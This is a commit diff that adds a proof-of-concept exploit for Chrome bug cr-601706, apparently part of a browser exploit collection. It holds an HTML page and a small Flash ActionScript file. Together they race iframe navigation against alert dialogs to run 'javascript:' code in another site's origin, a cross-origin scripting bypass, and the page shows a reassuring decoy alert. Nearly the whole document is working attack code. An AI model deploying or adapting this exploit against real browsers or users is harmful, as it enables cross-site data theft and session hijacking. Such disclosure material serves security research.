feat(chrome): add cr-601706

Author: Metnew

chrome/cr-601706/exploit.html

@@ -0,0 +1,36 @@
+<script>
+if (location.protocol == 'file:' || !navigator.plugins.namedItem('Shockwave Flash')) {
+  throw alert('HTTP server and Flash are required.');
+}
+
+var flip = 0;
+var sl = 0;
+var fl = 0;
+function f() {
+  sl = 1;
+  if (flip) {
+    flip = 0;
+    var a = i.contentDocument.createElement('a');
+    a.href = 'https://abc.xyz';
+    a.click();
+  }
+}
+
+function go() {
+  if (sl && fl) {
+    clearInterval(x);
+    i = document.createElement('iframe');
+    i.onload = function() {
+      i.onload = null;
+      flip = 1;
+      alert('This is an ordinary alert dialog, nothing to be concerned about.');
+    }
+    i.src = 'javascript:alert(location)';
+    document.documentElement.appendChild(i);
+  } 
+}
+
+var x = setInterval(go, 1);
+</script>
+<iframe src="https://abc.xyz" onload="fl=1"></iframe>
+<object data="s.swf"></object>

chrome/cr-601706/s.as

@@ -0,0 +1,10 @@
+package {
+  import flash.display.*;
+  import flash.external.*;
+  import flash.utils.*;
+  public class s extends Sprite {
+    public function s():void {
+      setInterval(ExternalInterface.call, 1, 'f');
+    }
+  }
+}